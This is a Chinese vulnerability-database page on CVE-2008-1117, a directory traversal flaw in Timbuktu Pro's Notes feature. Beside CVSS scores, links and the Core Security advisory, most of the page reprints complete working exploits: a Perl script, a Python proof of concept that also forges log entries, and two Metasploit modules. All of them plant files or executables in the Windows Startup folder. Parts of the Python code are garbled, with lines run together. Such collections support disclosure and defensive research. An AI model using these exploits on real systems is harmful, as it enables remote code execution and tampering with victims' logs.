微慑信息网

CVE-2008-1117-漏洞详情

CVE-2008-1117
CVSS 10.0
发布时间 :2008-03-14 16:44:00
修订时间 :2011-03-07 22:05:58
NMCOEPS    

[原文]Directory traversal vulnerability in the Notes (aka Flash Notes or instant messages) feature in tb2ftp.dll in Timbuktu Pro 8.6.5 for Windows, and possibly 8.7 for Mac OS X, allows remote attackers to upload files to arbitrary locations via a destination filename with a \ (backslash) character followed by ../ (dot dot slash) sequences. NOTE: this can be leveraged for code execution by writing to a Startup folder. NOTE: this issue reportedly exists because of an incomplete fix for CVE-2007-4220.


[CNNVD]Timbuktu Pro tb2pro.exe ‘tb2ftp.dll’目录遍历攻击漏洞(CNNVD-200803-228)

        Motorola的Timbuktu Pro是一款远程控制软件,允许远程访问计算机桌面。


        Timbuktu的tb2pro.exe所加载的tb2ftp.dll库在实现Notes功能期间检查目标文件名时没有正确地过滤”\”和”/”字符,攻击者执行目录遍历攻击,向目标机器的任意位置上传文件;


CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]


CWE (弱点类目)

CWE-22 [对路径名的限制不恰当(路径遍历)]


CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用


OVAL (用于检测的技术细节)

未找到相关OVAL定义


官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1117

(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-1117

(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200803-228

(官方数据源) CNNVD


其它链接及资源

http://www.vupen.com/english/advisories/2008/0840


(UNKNOWN)  VUPEN  ADV-2008-0840
http://www.securityfocus.com/bid/28081


(UNKNOWN)  BID  28081
http://www.securityfocus.com/archive/1/archive/1/489414/100/0/threaded


(UNKNOWN)  BUGTRAQ  20080311 CORE-2008-0204: Timbuktu Pro Remote Path Traversal and Log Injection
http://www.securityfocus.com/archive/1/archive/1/489382/100/0/threaded


(UNKNOWN)  BUGTRAQ  20080311 Re: [Full-disclosure] Vulnerabilities in Timbuktu Pro 8.6.5
http://www.securityfocus.com/archive/1/archive/1/489360/100/0/threaded


(UNKNOWN)  BUGTRAQ  20080310 Vulnerabilities in Timbuktu Pro 8.6.5
http://www.milw0rm.com/exploits/5238


(UNKNOWN)  MILW0RM  5238
http://www.milw0rm.com/exploits/4455


(UNKNOWN)  MILW0RM  4455
http://www.coresecurity.com/?action=item&id=2166


(UNKNOWN)  MISC  http://www.coresecurity.com/?action=item&id=2166
http://securityreason.com/securityalert/3741


(UNKNOWN)  SREASON  3741
http://secunia.com/advisories/29316


(VENDOR_ADVISORY)  SECUNIA  29316
http://aluigi.org/poc/timbuto.zip


(UNKNOWN)  MISC  http://aluigi.org/poc/timbuto.zip
http://aluigi.altervista.org/adv/timbuto-adv.txt


(UNKNOWN)  MISC  http://aluigi.altervista.org/adv/timbuto-adv.txt


漏洞信息

Timbuktu Pro tb2pro.exe ‘tb2ftp.dll’目录遍历攻击漏洞
危急 路径遍历
2008-03-14 00:00:00 2008-09-05 00:00:00
远程  
        Motorola的Timbuktu Pro是一款远程控制软件,允许远程访问计算机桌面。


        Timbuktu的tb2pro.exe所加载的tb2ftp.dll库在实现Notes功能期间检查目标文件名时没有正确地过滤”\”和”/”字符,攻击者执行目录遍历攻击,向目标机器的任意位置上传文件;


公告与补丁

        目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本:


        http://www.motorola.com/


漏洞信息 (4455)

Motorola Timbuktu Pro <= 8.6.5 File Deletion/Creation Exploit (EDBID:4455)
windows remote
2008-03-11 Verified
0 titon

N/A

[点击下载]

#!/usr/bin/perl
#ooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOO
# Timbuktu Pro <= 8.6.5 Arbitrary File Deletion/Creation
#
# Bug & Exploit by titon [titon{at}bastardlabs{dot}com]
#
# Advisory: 
# http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=590
#
# Copyright: (c)2007 BastardLabs
#ooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOO
#
# Usage: $ ./timbuktu_sploit.pl 192.168.0.69 407
#
#ooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOO
use IO::Socket;
use Time::HiRes qw(usleep);
##
## we start in the C:\Program Files\Timbuktu Pro\N1\ folder
##
$filename = &promptUser("Filename" ,"\\../../../pnw3d.bat");
##$filename = &promptUser("Filename" ,"../../../pnw3d.bat");
$payload = &promptUser("Payload ","echo pwwwnnn333ddd !!");
##
##payload can be either text or binary (in \x42\x69\x42 format)
##
$payload =~ s/\\x(..)/pack("C",hex($1))/egi;
##
## packet1 == “hello” packet
##
$packet1= "\x00\x01\x6b\x00\x00\xb0\x00\x23\x07\x22\x03\x07\xd6\x69\x6d\x3b".
"\x27\xa8\xd0\xf2\xd6\x69\x6d\x3b\x27\xa8\xd0\xf2\x00\x09\x01\x41".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x01\x97\x01\x41\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x04\xb7\x1d".
"\xbf\x42\x00\x00\x00\x00\x7f\x00\x00\x01\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00";
$packet2= "\xff";
##
## packet3 == packet containing the filename (with directory traversal)
##
$packet3= "\xfb\x00\x00\x00\x00\x54\x45\x58\x54\x74\x74\x78\x74\xc2\x32\x94".
"\xcc\xc2\x32\x94\xd9\x00\x00\x00\x00\x00\x00\x00\x13\x00\x00\x00".
"\x00\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00" . pack("C",length($filename)) . $filename ;
$packet4= "\xf9\x00";
##
## packet5 == payload, the size of the payload is over 2 bytes
## so we have 65535 bytes of data to play with
##
$packet5= "\xf8" . pack("n",length($payload)) . $payload ;
$packet6= "\xf7";
$packet7= "\xfa";
$packet8= "\xfe";
##
##DELETE THE FILE (IF NECESSARY)
##
print "[+] Delete the file (if necessary)\n";
print "[+] Connecting...\n";
$remote = &connection("$ARGV[0]","$ARGV[1]");
print "[+] Connected to $ARGV[0]:$ARGV[1]\n";
print $remote $packet1; print "[+] Packet 1 Sent\n"; usleep (80000);
print $remote $packet2; print "[+] Packet 2 Sent\n"; usleep (80000);
print $remote $packet3; print "[+] Packet 3 Sent\n"; usleep (80000);
##
## we break the connection before it's completed (i.e before the \xfe)
##
close $remote;
##
##(RE)CREATE THE FILE
##
print "[+] (Re)Create the file with our content\n";
print "[+] Connecting...\n";
$remote = &connection("$ARGV[0]","$ARGV[1]");
print "[+] Connected to $ARGV[0]:$ARGV[1]\n";
print $remote $packet1; print "[+] Packet 1 Sent\n"; usleep (80000);
print $remote $packet2; print "[+] Packet 2 Sent\n"; usleep (80000);
print $remote $packet3; print "[+] Packet 3 Sent\n"; usleep (80000);
print $remote $packet4; print "[+] Packet 4 Sent\n"; usleep (80000);
print $remote $packet5; print "[+] Packet 5 Sent\n"; usleep (80000);
print $remote $packet6; print "[+] Packet 6 Sent\n"; usleep (80000);
print $remote $packet7; print "[+] Packet 7 Sent\n"; usleep (80000);
print $remote $packet8; print "[+] Packet 8 Sent\n"; usleep (80000);
close $remote;
sub connection
{
local($dest,$port) = @_;
my $remote;
if (!$port or !dest) {
print "\nUsage: $ ./timbuktu_sploit.pl 192.168.0.69 407\n\n"; exit; }
else
{
$remote = IO::Socket::INET->new(
Proto => tcp,
PeerAddr => $dest,
PeerPort => $port,
Timeout => 1) or print "[-] Error: Could not establish a
connection to $dest:$port\n" and exit;
return $remote;
}
}
sub promptUser {
local($promptString,$defaultValue) = @_;
if ($defaultValue) {
print $promptString, "[", $defaultValue, "]: ";
} else {
print $promptString, ": ";
}
$| = 1; # force a flush after our print
$_ = ; # get the input from STDIN
chomp;
if ("$defaultValue") {
return $_ ? $_ : $defaultValue; # return $_ if it has a value
} else {
return $_;
}
}

# milw0rm.com [2007-09-25]

# milw0rm.com [2008-03-11]
  


漏洞信息 (5238)

Motorola Timbuktu Pro 8.6.5/8.7 Path Traversal / Log Injection Exploit
(EDBID:5238)
windows remote
2008-03-11 Verified
0 Core Security

N/A

[点击下载]

# Core Security Technologies - CoreLabs Advisory
#  http://www.coresecurity.com/corelabs

# Title: Timbuktu Pro Remote Path Traversal and Log Injection
# Advisory ID: CORE-2008-0204
# Advisory URL: http://www.coresecurity.com/?action=item&id=2166
# Date published: 2008-03-11
# Date of last update: 2008-03-11
# Vendors contacted: Motorola
# Release mode: Forced release

#  Proof of concept code follows. This PoC allows a remote attacker to
# upload a file to an arbitrary location on the victim's machine and forge
# peer information on the log lines of the victim's application.

from sys        import argv
from socket     import *
from struct     import pack

#from utils      import printFormatted
#from time import sleep

init_send_op_packet =   (   '\x00\x01\x60\x00\x00\x52\x00\x25'
                            '\x00\x22\x02\x01\x00\x04\x03\x07'
                            '\x00\x05\x00\x01\x00\x00\x00\xf1'
                            '\x06\x00\xf7\x76\xdd\x77\x00\x00'
                            '\x00\x00\x08\x7c\x67\x60\x00\x00'
                            '\x00\x00\x00\x00\x00\x00\x00\x00'
                            '\x00\x00\x18\xf1\x06\x00\xd1\x90'
                            '\xbc\x60\x38\xf1\x06\x00\x32\x94'
                            '\xc1\x60\x50\x92\xc4\x60\x00\x00'
                            '\x00\x00\x18\x92\xc4\x60\x2d\xbe'
                            '\x80\x7c\x08\x7c\x67\x60\x20\x46'
                        )

second_send_op_packet  = (  '\x00\x01\x61\x00\x00\x52\x00\x25'
                            '\x00\x22\x02\x01\x00\x04\x03\x07'
                            '\x00\x05\x00\x01\x10\x00\xe0\xf0'
                            '\x06\x00\x51\x05\x91\x7c\x28\x09'
                            '\x08\x00\x6d\x05\x91\x7c\x1c\xf1'
                            '\x06\x00\x02\x00\x00\x00\x10\x00'
                            '\x00\x00\xb8\xf5\xbe\x60\x00\x00'
                            '\xac\x00\x00\x00\x00\x00\xbd\xf5'
                            '\xbe\x60\x30\x90\xc4\x60\x07\x00'
                            '\x00\x00\xd0\x13\x63\x60\x71\xfb'
                            '\x90\x7c\x40\xf0\x06\x00\x0e\x00'
                            )

peer_info_exchange      = ( '\x00\x01\x62\x00\x00\xb0\x00\x23'
                            '\x07\x22\x03\x07\x70\x2c\xa5\x51'
                            '\x4c\xca\xe3\xfb\x70\x2c\xa5\x51'
                            '\x4c\xca\xe3\xfb\x00\x09'
                            '%(user_name)s'
                            '\x01\x97'
                            '%(host_name)s'
                            ''
                            '\x00\x00\x01\x02\x00\x04'
                            '\xb1\x1c\x39\x51\x00\x00\x00\x00'
                            '%(guest_ip_address)s'
                            '\x00\x00\x00\x00\x00\x00'
                            '\x00\x00\x00\x00\x00\x00'
                            )

ack_peer_info           =   '\xff'

attach_info_packet      = ('\xfb\x00\x00\x00\x00'
                            'BINAmdos'
                            '\xc2\x12\x49\xaf\xbd\x35\xac\x98'
                            '\x00\x00\x00\x00'
                            '%(attachment_length)s'
                            '\x00\x00\x00\x00'
                            '\xff\xff\xff\xff\x00\x00\x00\x00'
                            '\x00\x00\x00\x00\x00\x00\x00\x00'
                            '\x00\x00\x00\x00\x00\x00'
                            '%(attachment_filename)s'
                            )

attach_info_ack1        =  '\xf9\x00'

# Transfer file content here !!!
# \xF8 + 2 byte length + data

attach_file_ack1      =  '\xf7'

attach_file_ack2      =  '\xfa'


class Tb2FileSender:
    '''
    Fake timbuktu client that implements the 'Notes' feature to send a
    message with a file attached to it.
    '''

    def __init__(self, target, fake_src_ip, fake_hostname, fake_username, dest_filename, file_content):
        '''
        Setup TCP Connection to standard port TCP/407
        '''
        self.sck = socket(AF_INET, SOCK_STREAM)
        self.sck.connect((target, 407))
        self.fake_src_ip    = fake_src_ip
        self.fake_hostname  = fake_hostname     # Peer computer name
        self.fake_username  = fake_username     # Peer user name
        self.dest_filename  = dest_filename     # Destination filename including path (like ../../a.exe)
        self.file_content   = file_content      # Content of the destination file

    def sendAndRecv(self, packet, log, expected_response_length=0x500, print_response=False):
        self.sck.send(packet)
        if log:
            print '[-] %s' % log
        if expected_response_length > 0:
            resp = self.sck.recv(expected_response_length)
            if print_response:
                #printFormatted(resp)
                print '-' * 70 + '\n'
            return resp
        return None

    def getPascalString(self, str):
        '''
        Format the strings as 1 Byte Length + String.
        '''
        return pack('B', len(str)) + str

    def createFakePeerInfoPacket(self):
        '''
        Create a packet with forged guest information to avoid giving away
        real info in the log files.
        '''
        #
        # Ohhh... by the way, these two names goes diretly to the log file... ehehhee  🙂 
        #
        guest_host_name      = self.fake_hostname.replace('\\n', '\r\n')
        guest_user_name      = self.fake_username.replace('\\n', '\r\n')

        username_max_len     = 0x37 # This is not the application real limit,
        hostname_max_len     = 0x3f #   but it is the limit for this packet.

        host_name            = self.getPascalString(guest_host_name)
        user_name            = self.getPascalString(guest_user_name)

        # Pad the string to fill the empty space and avoid packet length recalculation
        host_name           += ('\x00' * (hostname_max_len - len(guest_host_name)))
        user_name           += ('\x00' * (username_max_len - len(guest_user_name)))

        guest_ip_address     = self.fake_src_ip.split('.')
        guest_ip_address     = pack('BBBB', int(guest_ip_address[0]), int(guest_ip_address[1]), int(guest_ip_address[2]), int(guest_ip_address[3]))

        return peer_info_exchange % vars()

    def getAttachContent(self):
        '''
        Retrieve the content of the local file and send it as the attach content.
        '''
        fd      = open(self.file_content, 'rb')
        data    = fd.read()
        fd.close()
        return data

    def send(self):
        '''
        Send a sequence of packet to upload our data to the filename and path
        specified by the user's parameters.
        '''

        # Begin protocol negotiation with the target
        self.sendAndRecv(init_send_op_packet,               'Note Operation initial packet sent.')
        self.sendAndRecv(second_send_op_packet,             'Note Operation negotiation packet sent.')

        # Send the packet with our fake info to fool the logs  🙂 
        self.sendAndRecv(self.createFakePeerInfoPacket(),   'Peer info packet sent.')
        self.sendAndRecv(ack_peer_info,                     'Ack peer info packet sent.')

        # Setup attachment packets that contain information about the file being transfered
        max_trx_chunk_size  = 0x5B4
        trx_until_resync    = 0x16C5

        payload             = self.getAttachContent()
        payload_length      = len(payload)
        attachment_length   = pack('>L', payload_length)

        #
        # Send info about the attachment.
        #
        # The '\' character is nedded to bypass the application filter.
        # This is actually the Bug !
        attachment_filename  = self.getPascalString('\\' + self.dest_filename.replace('\\', '/'))

        attach_info          = attach_info_packet % vars()

        self.sendAndRecv(attach_info     ,   'Attachment info sent.')
        self.sendAndRecv(attach_info_ack1,   'Attachment intermediate info sent.')

        # Create a list with the chunks to send and prepare their headers is appropriate
        attachment_content   = list()

        # We check if the data to send fits into one set of chunks.
        if payload_length < max_trx_chunk_size:
            attachment_content.append('\xF8' + pack('>H', payload_length) + payload)
        else:
            # If the data is bigger than one chunk, then send multiple chunks and their headers.
            curr_pos        = 0     # keeps our current position into the data file content
            resync_chunk    = True  # flag to indicate if a new set of chunk should be set
            pos_in_chunk    = 0     # keeps our position into the current chunk set
            do_recv         = False # flag to indicate if recv is needed to receive target data

            while curr_pos <= payload_length:
                do_recv      = False
                # Is this the last chunk ?
                if curr_pos > 0 and pos_in_chunk != trx_until_resync:
                    # If it is the last chunk, then just set length to the rest of the data
                    if trx_until_resync - pos_in_chunk < max_trx_chunk_size:
                        chunk_length = trx_until_resync - pos_in_chunk
                        do_recv = True
                    else:
                        # Otherwise, set the data length as usual because it's an intermediate chunk
                        chunk_length = max_trx_chunk_size data         = ''
                else:
                    # Start a new set of chunks and check if this is not the last set
                    # If it is, then don't set the maximun size, just the rest of the length.
                    data         = '\xF8'   # Set the chunk set header
                    if payload_length - curr_pos < trx_until_resync:
                        chunk_length = payload_length - curr_pos
                        data        += pack('>H', chunk_length)
                    else:
                        # This is not the last chunk, so we set the maximun size and begin
                        #   it transmittion.
                        chunk_length = max_trx_chunk_size
                        data        += pack('>H', trx_until_resync) pos_in_chunk = 0

                # Append the current chunk into a list to be sent later
                attachment_content.append((do_recv, data + payload[curr_pos : curr_pos + chunk_length]))
                curr_pos        += chunk_length
                pos_in_chunk    += chunk_length

        #
        # Send file content in small chunks
        #
        print '[-] Beginning file transfer... (this may take some time)'
        for chunk in attachment_content:
            if chunk[0]:
                do_recv = 0x500
            else:
                do_recv = 0
            self.sendAndRecv(chunk[1], '', do_recv)
            #sleep(0.5)
        print '[-] File transfer complete'

        # Send the final ACKs to allow the program to create the remote file.
        self.sendAndRecv(attach_file_ack1,   'Note body intermediate info sent.')
        self.sendAndRecv(attach_file_ack2,   'Note body intermediate info sent.')

        # Close the connection here to avoid the program displaying any message
        self.sck.close()
        return


if __name__ == "__main__":
    if len(argv) != 7:
        print (r'\nUsage:\n\n%s    '
                '  \n\n'
                'Example:\n\n'
                '%s victim.com 1.2.3.4 trust.com yourAdmin "..\..\..\Documents And Settings\All Users\Start Menu\Programs\Startup\evil.exe" c:\payload.exe' % (argv[0], argv[0]) )
    else:
        target          = argv[1]
        fake_src_ip     = argv[2]
        fake_hostname   = argv[3]
        fake_username   = argv[4]
        dest_filename   = argv[5]
        file_content    = argv[6]

        tb2 = Tb2FileSender(target, fake_src_ip, fake_hostname, fake_username, dest_filename, file_content)
        tb2.send()

# milw0rm.com [2008-03-11]
  


漏洞信息 (16339)

Timbuktu Pro Directory Traversal/File Upload (EDBID:16339)
windows remote
2010-11-24 Verified
0 metasploit

N/A

[点击下载]

##
# $Id: timbuktu_fileupload.rb 11127 2010-11-24 19:35:38Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = ExcellentRanking

 include Msf::Exploit::Remote::Tcp
 include Msf::Exploit::EXE

 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'Timbuktu Pro Directory Traversal/File Upload',
   'Description'    => %q{
    This module exploits a directory traversal vulnerablity in Motorola's
    Timbuktu Pro for Windows 8.6.5.
   },
   'Author'         => [ 'MC' ],
   'License'        => MSF_LICENSE,
   'Version'        => '$Revision: 11127 $',
   'References'     =>
    [
     [ 'CVE', '2008-1117' ],
     [ 'OSVDB', '43544' ],
    ],
   'Privileged'     => true,
   'DefaultOptions' =>
    {
     'EXITFUNC' => 'process',
    },
   'Payload'        =>
    {
     'Space'    => 2048,
     'DisableNops' => true,
     'StackAdjustment' => -3500,
    },
   'Platform'       => 'win',
   'Targets'        =>
    [
     [ 'Automatic',  { } ],
    ],
   'DefaultTarget' => 0,
   'DisclosureDate' => 'May 10 2008'))

  register_options(
   [
    Opt::RPORT(407),
    OptString.new('PATH', [ true, 'The path to place the executable.', '\\../../../Documents and Settings/All Users/Start Menu/Programs/Startup/']),
   ], self.class)
 end

 def exploit
  connect

  exe  = rand_text_alpha(8) + ".exe"
  data = generate_payload_exe

  pkt1 =  "\x00\x01\x6B\x00\x00\xB0\x00\x23\x07\x22\x03\x07\xD6\x69\x6D\x3B"
  pkt1 << "\x27\xA8\xD0\xF2\xD6\x69\x6D\x3B\x27\xA8\xD0\xF2\x00\x09\x01\x41"
  pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  pkt1 << "\x00\x00\x00\x00\x00\x00\x01\x97\x01\x41\x00\x00\x00\x00\x00\x00"
  pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x04\xB7\x1D"
  pkt1 << "\xBF\x42\x00\x00\x00\x00\x7F\x00\x00\x01\x00\x00\x00\x00\x00\x00"
  pkt1 << "\x00\x00\x00\x00\x00\x00"

  pkt3 =  "\xFB\x00\x00\x00\x00\x54\x45\x58\x54\x74\x74\x78\x74\xC2\x32\x94"
  pkt3 << "\xCC\xC2\x32\x94\xD9\x00\x00\x00\x00\x00\x00\x00\x13\x00\x00\x00"
  pkt3 << "\x00\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  pkt3 << "\x00\x00\x00\x00\x00\x00\x00"
  pkt3 << [datastore['PATH'].length + exe.length].pack('C') + datastore['PATH'] + exe

  print_status("Connecting to #{rhost} on port #{rport}...")

  sock.put(pkt1)
  select(nil,nil,nil,0.15)

  sock.put("\xFF")
  select(nil,nil,nil,0.15)

  sock.put(pkt3)
  select(nil,nil,nil,0.15)

  sock.put("\xF9\x00")
  select(nil,nil,nil,0.15)

  print_status("Sending EXE payload '#{exe}' to #{rhost}:#{rport}...")
  sock.put("\xF8" + [data.length].pack('n') + data)
  select(nil,nil,nil,5)

  sock.put("\xF7")
  select(nil,nil,nil,0.15)

  sock.put("\xFA")
  select(nil,nil,nil,0.15)

  sock.put("\xFE")
  select(nil,nil,nil,0.08)

  print_status("Done!")
  disconnect

 end
end
  

-
漏洞信息 (F82939)

Timbuktu Pro Directory Traversal/File Upload. (PacketStormID:F82939)

2009-11-26 00:00:00
MC  metasploit.com

exploit

windows

CVE-2008-1117

[点击下载]

This Metasploit module exploits a directory traversal vulnerability in Motorola's Timbuktu Pro for Windows 8.6.5.

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

 include Msf::Exploit::Remote::Tcp

 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'Timbuktu Pro Directory Traversal/File Upload.',
   'Description'    => %q{
    This module exploits a directory traversal vulnerablity in Motorola's
    Timbuktu Pro for Windows 8.6.5.
   },
   'Author'         => [ 'MC' ],
   'License'        => MSF_LICENSE,   
   'Version'        => '$Revision$',
   'References'     => 
    [ 
     [ 'CVE', '2008-1117' ],
     [ 'OSVDB', '43544' ],
    ],
   'Privileged'     => true,
   'DefaultOptions' =>
    {
     'EXITFUNC' => 'process',
    },
   'Payload'        =>
    {
     'Space'    => 2048,
     'DisableNops' => true,
     'StackAdjustment' => -3500,
    },
   'Platform'       => 'win',
   'Targets'        =>
    [
     [ 'Automatic',  { } ],
    ],
   'DefaultTarget' => 0,
   'DisclosureDate' => 'May 10 2008'))

   register_options(
    [
     Opt::RPORT(407),
     OptString.new('PATH', [ true, 'The path to place the executable.', '\\../../../Documents and Settings/All Users/Start Menu/Programs/Startup/']),
    ], self.class)

 end

 def exploit
  connect

  exe  = rand_text_alpha(8) + ".exe"
  data = Rex::Text.to_win32pe(payload.encoded, '')

                pkt1 =  "\x00\x01\x6B\x00\x00\xB0\x00\x23\x07\x22\x03\x07\xD6\x69\x6D\x3B"
                pkt1 << "\x27\xA8\xD0\xF2\xD6\x69\x6D\x3B\x27\xA8\xD0\xF2\x00\x09\x01\x41"
                pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                pkt1 << "\x00\x00\x00\x00\x00\x00\x01\x97\x01\x41\x00\x00\x00\x00\x00\x00"
                pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                pkt1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x04\xB7\x1D"
                pkt1 << "\xBF\x42\x00\x00\x00\x00\x7F\x00\x00\x01\x00\x00\x00\x00\x00\x00"
                pkt1 << "\x00\x00\x00\x00\x00\x00"

                pkt3 =  "\xFB\x00\x00\x00\x00\x54\x45\x58\x54\x74\x74\x78\x74\xC2\x32\x94"
                pkt3 << "\xCC\xC2\x32\x94\xD9\x00\x00\x00\x00\x00\x00\x00\x13\x00\x00\x00"
                pkt3 << "\x00\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                pkt3 << "\x00\x00\x00\x00\x00\x00\x00"
                pkt3 << [datastore['PATH'].length + exe.length].pack('C') + datastore['PATH'] + exe

                print_status("Connecting to #{rhost} on port #{rport}...")
                
  sock.put(pkt1)
                sleep(0.15)

                sock.put("\xFF")
                sleep(0.15)

                sock.put(pkt3)
                sleep(0.15)

                sock.put("\xF9\x00")
                sleep(0.15)

                print_status("Sending EXE payload '#{exe}' to #{rhost}:#{rport}...")
                sock.put("\xF8" + [data.length].pack('n') + data)
                sleep(5)

                sock.put("\xF7")
                sleep(0.15)

                sock.put("\xFA")
                sleep(0.15)

                sock.put("\xFE")
                sleep(0.08)

                print_status("Done!")
                disconnect
 
 end
end
    

-
漏洞信息 (F64510)

Core Security Technologies Advisory 2008.0204 (PacketStormID:F64510)

2008-03-13 00:00:00
Core Security Technologies,Sebastian Muniz  coresecurity.com

exploit,remote,vulnerability

CVE-2008-1117,CVE-2008-1118

[点击下载]

Core Security Technologies Advisory - Timbuktu Pro suffers from remote path traversal and log injection vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

      Core Security Technologies - CoreLabs Advisory
           http://www.coresecurity.com/corelabs

Timbuktu Pro Remote Path Traversal and Log Injection


*Advisory Information*

Title: Timbuktu Pro Remote Path Traversal and Log Injection
Advisory ID: CORE-2008-0204
Advisory URL: http://www.coresecurity.com/?action=item&id=2166
Date published: 2008-03-11
Date of last update: 2008-03-11
Vendors contacted: Motorola
Release mode: Forced release


*Vulnerability Information*

Class: Remote Path Traversal
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 28081 
CVE Name: CVE-2008-1117, CVE-2008-1118 


*Vulnerability Description*

Timbuktu Pro [1] is a desktop-to-desktop remote control software for the
Windows and Macintosh operating systems. The following vulnerabilities
have been identified in Timbuktu Pro:

 1) File transfer directory traversal (CVE-2008-1117): The '\' and '/'
are not properly sanitized when checking the destination filename. The
problem resides in the Notes feature implemented by tb2ftp.dll loaded by
the tb2pro.exe. This is the main issue.

 2) Log input manipulation (CVE-2008-1118): Several fields of the packet
containing peer information (computer name, user name and IP address)
are taken from the packet sent to the target and used to display this
information on the screen of the target.

 The vulnerabilities discovered allow a remote attacker to upload a file
to an arbitrary location on the victim's machine and forge peer
information on the log lines of the victim's application. For example,
an attacker could write an executable in a startup directory of the
victim's machine and wait for the user to restart his/her machine.
Another example is to write a fake system DLL in an existing program
directory, inducing Windows to load this module instead of the real DLL
from 'C:\WINDOWS\system32\'




*Vulnerable Packages*

. Timbuktu Pro 8.6.5 for Windows.
. Timbuktu Pro 8.7 for Mac OS X may also be vulnerable.


*Non-vulnerable Packages*



*Vendor Information, Solutions and Workarounds*

Contact the vendor for fix information.


*Credits*

This vulnerability was discovered and researched by Sebastian Mu    

-
漏洞信息


43544
Motorola Timbuktu Pro Flash Notes (tb2ftp.dll) Traversal Arbitrary File Upload

Remote / Network Access

Input Manipulation
Loss of Integrity
Exploit Public Uncoordinated Disclosure

-
漏洞描述

Timbuktu contains a flaw that allows a remote attacker to upload files to arbitrary locations outside of the web path. The issue is due to the Flash Notes component not properly sanitizing user input, specifically failing to properly escape the '/' and '\' characters.

-
时间线


2008-03-10

Unknow
2008-03-10 Unknow

-
解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

-
相关参考

-
漏洞作者

-
漏洞信息

Timbuktu Pro File Upload and Log Input Manipulation Vulnerabilities

Input Validation Error

28081
Yes No
2008-03-10 12:00:00 2008-03-12 12:31:00

Sebastian Muñiz is credited with the discovery of these vulnerabilities.

-
受影响的程序版本

Motorola Timbuktu 8.6.5

-
漏洞讨论

Timbuktu Pro is prone to an arbitrary-file-upload vulnerability and a vulnerability that allows attackers to disrupt the logging of events.



An attacker can exploit these issues to upload arbitrary files and prevent the logging of events. This may lead to other attacks.



Timbuktu Pro 8.6.5 for Windows is vulnerable; other versions running on different platforms may also be affected.



